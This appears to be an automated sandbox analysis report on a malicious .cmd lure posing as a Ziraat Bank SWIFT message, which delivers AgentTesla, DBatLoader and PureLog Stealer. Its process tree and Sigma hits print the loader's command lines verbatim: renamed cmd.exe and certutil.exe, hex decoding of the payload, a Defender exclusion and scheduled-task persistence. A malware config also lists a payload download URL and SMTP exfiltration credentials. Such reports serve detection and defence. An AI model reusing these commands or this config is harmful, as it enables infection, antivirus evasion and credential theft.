Windows Analysis Report
Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd

Overview

General Information

Sample name: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd
Analysis ID: 1557464
MD5: 5f351f07b94613764a8bc09970bbcd58
SHA1: 47fcfcac926a0007010b7afb776671d2276b8b81
SHA256: 2a81c419a9fcd1eb9f778dba6911c366586b0ae9a5cf2cd25155413bfbff9eea
Tags: cmduser-lowmal3

Detection

AgentTesla, DBatLoader, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected DBatLoader
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates files in the system32 config directory
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops large PE files
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Infects executable files (exe, dll, sys, html)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Queries random domain names (often used to prevent blacklisting and sinkholes)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Registers a new ROOT certificate
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijacking Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Program Location with Network Connections
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Connects to many different domains
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Executes massive DNS lookups (> 100)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Use Short Name Path in Command Line
Spawns drivers
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 6216 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 5640 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 1540 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 5896 cmdline: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 6660 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 6680 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 4508 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 6816 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • AnyDesk.PIF (PID: 6588 cmdline: C:\Users\Public\Libraries\AnyDesk.PIF MD5: 2EF70D96354CC04D9168E8F69E7B17A0)
      • cmd.exe (PID: 6836 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • esentutl.exe (PID: 1624 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
        • esentutl.exe (PID: 1552 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
        • alpha.pif (PID: 3256 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • alpha.pif (PID: 2380 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • alpha.pif (PID: 316 cmdline: C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • xpha.pif (PID: 2260 cmdline: C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • esentutl.exe (PID: 2044 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
        • conhost.exe (PID: 1268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • aymtmquJ.pif (PID: 3168 cmdline: C:\Users\Public\Libraries\aymtmquJ.pif MD5: C116D3604CEAFE7057D77FF27552C215)
        • Native_neworigin.exe (PID: 2724 cmdline: "C:\Users\user~1\AppData\Local\Temp\Native_neworigin.exe" MD5: 9ECE2AAE8E8FA77849268DDA20CAEC7B)
        • Trading_AIBot.exe (PID: 2032 cmdline: "C:\Users\user~1\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)
          • powershell.exe (PID: 3988 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 4232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 1580 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • schtasks.exe (PID: 5576 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:06 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 1832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • alpha.exe (PID: 2848 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 5896 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • alg.exe (PID: 5368 cmdline: C:\Windows\System32\alg.exe MD5: 39868E9AD4918B18A6AD00C9FF3BE84E)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 1916 cmdline: C:\Windows\system32\AppVClient.exe MD5: 7CB21DCAD3B21967F4E5DF9CF3F75EC0)
  • Juqmtmya.PIF (PID: 1588 cmdline: "C:\Users\Public\Libraries\Juqmtmya.PIF" MD5: 2EF70D96354CC04D9168E8F69E7B17A0)
    • aymtmquJ.pif (PID: 2468 cmdline: C:\Users\Public\Libraries\aymtmquJ.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • Native_neworigin.exe (PID: 1260 cmdline: "C:\Users\user~1\AppData\Local\Temp\Native_neworigin.exe" MD5: 9ECE2AAE8E8FA77849268DDA20CAEC7B)

Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: DBatLoader
Description: This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

{"Download Url": ["https://gxe0.com/yak2/233_Juqmtmyadyy"]}
{"Exfil Mode": "SMTP", "Host": "s82.gocheapweb.com\"", "Username": "info2@j-fores.com", "Password": "london@1759 "}

Source: 00000020.00000003.1680680146.000000000089E000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Author: Joe Security
Source: 00000020.00000002.1948863536.0000000005180000.00000004.08000000.00040000.00000000.sdmp, Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Author: Joe Security
Source: 0000002F.00000003.1847868691.0000000000891000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Author: Joe Security
Source: 0000000F.00000003.1293644753.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Author: Joe Security
Source: 0000000F.00000003.1294144317.000000007F920000.00000004.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Author: Joe Security

Source: 32.2.Native_neworigin.exe.2b26216.2.raw.unpack, Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Author: Joe Security
Source: 47.2.Native_neworigin.exe.400000.0.unpack, Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Author: ditekSHen, Strings:
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 33 88 44 24 2B 88 44 24 2F B0 50 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
Source: 47.2.Native_neworigin.exe.3eac190.5.unpack, Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Author: Joe Security
Source: 47.3.Native_neworigin.exe.891c18.0.unpack, Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Author: Joe Security
Source: 32.3.Native_neworigin.exe.89ece0.17.unpack, Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Author: Joe Security

System Summary

Source: File created, Author: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 6588, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
Source: Process started, Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6216, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 1540, ProcessName: alpha.exe
Source: Registry Key set, Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Juqmtmya.url, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 6588, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Juqmtmya
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 1540, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 5896, ProcessName: extrac32.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 2032, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3988, ProcessName: powershell.exe
Source: Network Connection, Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 198.252.105.91, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Libraries\AnyDesk.PIF, Initiated: true, ProcessId: 6588, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49699
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Juqmtmya.url, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 6588, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Juqmtmya
Source: Process started, Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\AnyDesk.PIF, CommandLine: C:\Users\Public\Libraries\AnyDesk.PIF, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\AnyDesk.PIF, NewProcessName: C:\Users\Public\Libraries\AnyDesk.PIF, OriginalFileName: C:\Users\Public\Libraries\AnyDesk.PIF, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6216, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 6588, ProcessName: AnyDesk.PIF
Source: File created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ProcessId: 2032, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:06 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:06 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 2032, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:06 /du 23:59 /sc daily /ri 1 /f, ProcessId: 5576, ProcessName: schtasks.exe
Source: Network Connection, Author: frack113: Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe, Initiated: true, ProcessId: 2724, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49922
Source: Process started, Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\Native_neworigin.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\Native_neworigin.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe, ParentCommandLine: C:\Users\Public\Libraries\aymtmquJ.pif, ParentImage: C:\Users\Public\Libraries\aymtmquJ.pif, ParentProcessId: 3168, ParentProcessName: aymtmquJ.pif, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\Native_neworigin.exe" , ProcessId: 2724, ProcessName: Native_neworigin.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 2032, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3988, ProcessName: powershell.exe
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T09:56:12.974837+010020283713Unknown Traffic192.168.2.749700198.252.105.91443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T09:59:12.740525+010020516541A Network Trojan was detected192.168.2.7557731.1.1.153UDP
                    2024-11-18T09:59:23.892905+010020516541A Network Trojan was detected192.168.2.7528191.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T09:58:39.336228+010020516511A Network Trojan was detected192.168.2.7611181.1.1.153UDP
                    2024-11-18T09:58:58.230245+010020516511A Network Trojan was detected192.168.2.7502421.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T09:59:05.904050+010020516531A Network Trojan was detected192.168.2.7537581.1.1.153UDP
                    2024-11-18T09:59:17.857629+010020516531A Network Trojan was detected192.168.2.7587511.1.1.153UDP
                    2024-11-18T09:59:17.880138+010020516531A Network Trojan was detected192.168.2.7587511.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T09:59:21.215052+010020516501A Network Trojan was detected192.168.2.7530531.1.1.153UDP
                    2024-11-18T09:59:21.247295+010020516501A Network Trojan was detected192.168.2.7530531.1.1.153UDP
                    2024-11-18T09:59:31.371397+010020516501A Network Trojan was detected192.168.2.7654641.1.1.153UDP
                    2024-11-18T09:59:31.395946+010020516501A Network Trojan was detected192.168.2.7654641.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T09:59:42.932074+010020516521A Network Trojan was detected192.168.2.7555891.1.1.153UDP
                    2024-11-18T09:59:51.959681+010020516521A Network Trojan was detected192.168.2.7592181.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T09:56:57.079419+010020516491A Network Trojan was detected192.168.2.7505011.1.1.153UDP
                    2024-11-18T09:57:01.012200+010020516491A Network Trojan was detected192.168.2.7502481.1.1.153UDP
                    2024-11-18T09:57:31.231494+010020516491A Network Trojan was detected192.168.2.7545071.1.1.153UDP
                    2024-11-18T10:00:03.732796+010020516491A Network Trojan was detected192.168.2.7625101.1.1.153UDP
                    2024-11-18T10:00:09.051307+010020516491A Network Trojan was detected192.168.2.7571651.1.1.153UDP
                    2024-11-18T10:00:09.083433+010020516491A Network Trojan was detected192.168.2.7571651.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T09:56:55.359429+010020516481A Network Trojan was detected192.168.2.7594651.1.1.153UDP
                    2024-11-18T09:56:58.704311+010020516481A Network Trojan was detected192.168.2.7600921.1.1.153UDP
                    2024-11-18T09:57:29.842892+010020516481A Network Trojan was detected192.168.2.7545671.1.1.153UDP
                    2024-11-18T10:00:01.256401+010020516481A Network Trojan was detected192.168.2.7539261.1.1.153UDP
                    2024-11-18T10:00:07.633314+010020516481A Network Trojan was detected192.168.2.7519801.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T09:56:51.616371+010020181411A Network Trojan was detected54.244.188.17780192.168.2.749883TCP
                    2024-11-18T09:56:53.165851+010020181411A Network Trojan was detected18.141.10.10780192.168.2.749888TCP
                    2024-11-18T09:56:55.358034+010020181411A Network Trojan was detected44.221.84.10580192.168.2.749906TCP
                    2024-11-18T09:57:33.379985+010020181411A Network Trojan was detected47.129.31.21280192.168.2.750011TCP
                    2024-11-18T09:57:35.196947+010020181411A Network Trojan was detected13.251.16.15080192.168.2.750013TCP
                    2024-11-18T09:57:40.703360+010020181411A Network Trojan was detected34.246.200.16080192.168.2.750018TCP
                    2024-11-18T09:57:48.496579+010020181411A Network Trojan was detected35.164.78.20080192.168.2.750025TCP
                    2024-11-18T09:57:49.313279+010020181411A Network Trojan was detected3.94.10.3480192.168.2.750026TCP
                    2024-11-18T09:58:08.560846+010020181411A Network Trojan was detected34.211.97.4580192.168.2.750043TCP
                    2024-11-18T09:58:15.584854+010020181411A Network Trojan was detected18.208.156.24880192.168.2.750054TCP
                    2024-11-18T09:58:39.026226+010020181411A Network Trojan was detected3.254.94.18580192.168.2.750091TCP
                    2024-11-18T09:58:59.043100+0100 | 2018141 | 1 | A Network Trojan was detected | 18.246.231.120 | 80 | 192.168.2.7 | 50124 | TCP
                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2024-11-18T09:56:51.616371+0100 | 2037771 | 1 | A Network Trojan was detected | 54.244.188.177 | 80 | 192.168.2.7 | 49883 | TCP
                    2024-11-18T09:56:53.165851+0100 | 2037771 | 1 | A Network Trojan was detected | 18.141.10.107 | 80 | 192.168.2.7 | 49888 | TCP
                    2024-11-18T09:56:55.358034+0100 | 2037771 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.7 | 49906 | TCP
                    2024-11-18T09:57:33.379985+0100 | 2037771 | 1 | A Network Trojan was detected | 47.129.31.212 | 80 | 192.168.2.7 | 50011 | TCP
                    2024-11-18T09:57:35.196947+0100 | 2037771 | 1 | A Network Trojan was detected | 13.251.16.150 | 80 | 192.168.2.7 | 50013 | TCP
                    2024-11-18T09:57:40.703360+0100 | 2037771 | 1 | A Network Trojan was detected | 34.246.200.160 | 80 | 192.168.2.7 | 50018 | TCP
                    2024-11-18T09:57:48.496579+0100 | 2037771 | 1 | A Network Trojan was detected | 35.164.78.200 | 80 | 192.168.2.7 | 50025 | TCP
                    2024-11-18T09:57:49.313279+0100 | 2037771 | 1 | A Network Trojan was detected | 3.94.10.34 | 80 | 192.168.2.7 | 50026 | TCP
                    2024-11-18T09:58:08.560846+0100 | 2037771 | 1 | A Network Trojan was detected | 34.211.97.45 | 80 | 192.168.2.7 | 50043 | TCP
                    2024-11-18T09:58:15.584854+0100 | 2037771 | 1 | A Network Trojan was detected | 18.208.156.248 | 80 | 192.168.2.7 | 50054 | TCP
                    2024-11-18T09:58:39.026226+0100 | 2037771 | 1 | A Network Trojan was detected | 3.254.94.185 | 80 | 192.168.2.7 | 50091 | TCP
